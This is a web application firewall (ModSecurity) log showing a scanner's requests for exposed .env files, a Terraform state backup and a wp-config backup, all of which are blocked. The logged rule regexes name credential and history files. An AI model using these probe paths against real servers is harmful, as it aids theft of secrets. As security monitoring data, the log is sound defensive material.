[Tue May 26 14:49:46.349635 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtiAAAqVw"]
[Tue May 26 14:49:46.365216 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtgwAAqVY"]
[Tue May 26 14:49:46.365394 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtkAAAqVQ"]
[Tue May 26 14:49:46.367300 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtjAAAAIw"]
[Tue May 26 14:49:46.369885 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthQAAAMQ"]
[Tue May 26 14:49:46.375943 2026] [security2:error] [pid 648203:tid 648281] [remote 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthgAAqU0"]
[Tue May 26 14:49:46.375946 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtggAAqUA"]
[Tue May 26 14:49:46.376615 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTthwAAqWs"]
[Tue May 26 14:49:46.380161 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTtigAAqTk"]
[Tue May 26 14:49:46.382661 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsbEQDDtxJNiDrdTteAAAAOQ"]
[Tue May 26 14:49:46.491074 2026] [security2:error] [pid 648203:tid 648266] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/srv/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtrwAAxj4"]
[Tue May 26 14:49:46.494450 2026] [security2:error] [pid 648203:tid 648212] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stage/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtsAAAxgg"]
[Tue May 26 14:49:46.497163 2026] [security2:error] [pid 648203:tid 648284] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/staging/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtsQAAxlA"]
[Tue May 26 14:49:46.513550 2026] [security2:error] [pid 648203:tid 648307] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stg/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTttgAAxmc"]
[Tue May 26 14:49:46.532886 2026] [security2:error] [pid 648203:tid 648207] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stripe/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTtwQAAxgM"]
[Tue May 26 14:49:46.551559 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtrgAAxgU"]
[Tue May 26 14:49:46.556967 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtsgAAxmQ"]
[Tue May 26 14:49:46.559323 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTttAAAxnE"]
[Tue May 26 14:49:46.564813 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtswAAxm4"]
[Tue May 26 14:49:46.565059 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTttQAAxnk"]
[Tue May 26 14:49:46.581077 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtuAAAxl0"]
[Tue May 26 14:49:46.594673 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtvQAAxgE"]
[Tue May 26 14:49:46.595526 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtuQAAxmo"]
[Tue May 26 14:49:46.599665 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtuwAAxl4"]
[Tue May 26 14:49:46.626232 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtxAAAAJE"]
[Tue May 26 14:49:46.633359 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtwwAAALY"]
[Tue May 26 14:49:46.705122 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtxQAAxgY"]
[Tue May 26 14:49:46.707428 2026] [security2:error] [pid 648203:tid 648323] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlsrEQDDtxJNiDrdTt1QAAxnc"]
[Tue May 26 14:49:46.718084 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtygAAANY"]
[Tue May 26 14:49:46.721460 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtywAAALk"]
[Tue May 26 14:49:46.729522 2026] [security2:error] [pid 648203:tid 648294] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt3AAAxlo"]
[Tue May 26 14:49:46.743254 2026] [security2:error] [pid 648203:tid 648322] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt3gAAxnY"]
[Tue May 26 14:49:46.794188 2026] [security2:error] [pid 648203:tid 648312] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/user/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt6AAAxmw"]
[Tue May 26 14:49:46.862382 2026] [security2:error] [pid 648203:tid 648320] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v1/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt8gAAxnQ"]
[Tue May 26 14:49:46.881138 2026] [security2:error] [pid 648203:tid 648291] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v2/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt9gAAxlc"]
[Tue May 26 14:49:46.881177 2026] [security2:error] [pid 648203:tid 648228] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v3/.env"] [unique_id "ahVlsrEQDDtxJNiDrdTt9wAAxhg"]
[Tue May 26 14:49:47.000569 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.5:16498] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.old"] [unique_id "ahVls7EQDDtxJNiDrdTuAgAAAOk"]
[Tue May 26 14:49:47.289815 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTtzgAAAJQ"]
[Tue May 26 14:49:47.308449 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt0QAAAIo"]
[Tue May 26 14:49:47.341520 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt5AAAAJU"]
[Tue May 26 14:49:47.341892 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt2gAAAPs"]
[Tue May 26 14:49:47.343298 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuCQAAALE"]
[Tue May 26 14:49:47.344125 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt1wAAxmU"]
[Tue May 26 14:49:47.345593 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt2QAAANo"]
[Tue May 26 14:49:47.348677 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt8wAAALU"]
[Tue May 26 14:49:47.349498 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt-wAAAMw"]
[Tue May 26 14:49:47.353457 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt-AAAAOg"]
[Tue May 26 14:49:47.358110 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt4wAAAOI"]
[Tue May 26 14:49:47.358174 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt3QAAAQQ"]
[Tue May 26 14:49:47.362199 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt_gAAAO0"]
[Tue May 26 14:49:47.363745 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuCgAAALw"]
[Tue May 26 14:49:47.366340 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuAwAAxnI"]
[Tue May 26 14:49:47.371896 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlsrEQDDtxJNiDrdTt5wAAANA"]
[Tue May 26 14:49:47.514591 2026] [security2:error] [pid 648203:tid 648217] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/.env"] [unique_id "ahVls7EQDDtxJNiDrdTuJgAArg0"]
[Tue May 26 14:49:47.515068 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuFgAAAPI"]
[Tue May 26 14:49:47.523984 2026] [security2:error] [pid 648203:tid 648240] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/html/.env"] [unique_id "ahVls7EQDDtxJNiDrdTuLAAAriQ"]
[Tue May 26 14:49:47.538938 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuFwAArnw"]
[Tue May 26 14:49:47.569569 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuGgAArng"]
[Tue May 26 14:49:47.577934 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuJwAAANk"]
